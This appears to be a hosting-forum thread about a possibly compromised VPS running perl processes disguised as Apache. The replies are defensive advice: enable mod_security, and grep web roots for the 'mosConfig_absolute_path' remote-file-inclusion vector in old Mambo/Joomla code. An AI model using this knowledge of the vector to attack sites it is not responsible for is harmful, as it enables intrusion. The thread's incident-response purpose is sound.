Lots of apache /usr/sbin/apache2 -k start processes

[bob231]

We got notices by our vps provider that our vps have maybe problems:

They point to this report: http://firewall.sigsiu.net/index.php?ip=85.17.149.15&force=1

On the server we notice there is a large amount of perl processes.
When we check the command by one of those processes in /proc is said:
/usr/sbin/apache2 -k start

We also did enable server-status in http to find out more information about the proces, but these processes were not displayed.

Then we run rkhunter, it didnt detcect any malware.
My question is how can we be sure this vps isnt hack, how can we find out more information about the perl processes?

Thanks a lot.

 

[UFHH01]

First, please turn on mod_security, to make sure, that these exploits are blocked by your server.

"mosConfig_absolute_path" is used in unsecure Mambo and Joomla sources and with this part of code it is possible to include a remote file in an URL. => So please check the Mambo and Joomla sources and extensions for such exploits and deaktivate them, by renaming the whole folder of the source or extension on that domain. Inform the subscriber of the domain, that you deactivated the source or extension because of security reason.

 

[bob231]

Thanks for feedback! Its really useful. Do you maybe know as well a way to detect all unsecure sourche in one command?
Weve to find files contain mosConfig_absolute_path right?

 

[UFHH01]

@bob231 :

you could use "find" or "grep" on linux based systems.

Example:

grep -H -r "mosConfig_absolute_path" /var/www/

This will search for the pattern "mosConfig_absolute_path" in the folder "/var/www/" recursively. Depending on your domains and files on your system, this could take a while... get some coffee and enjoy the sun while the search takes part. ^^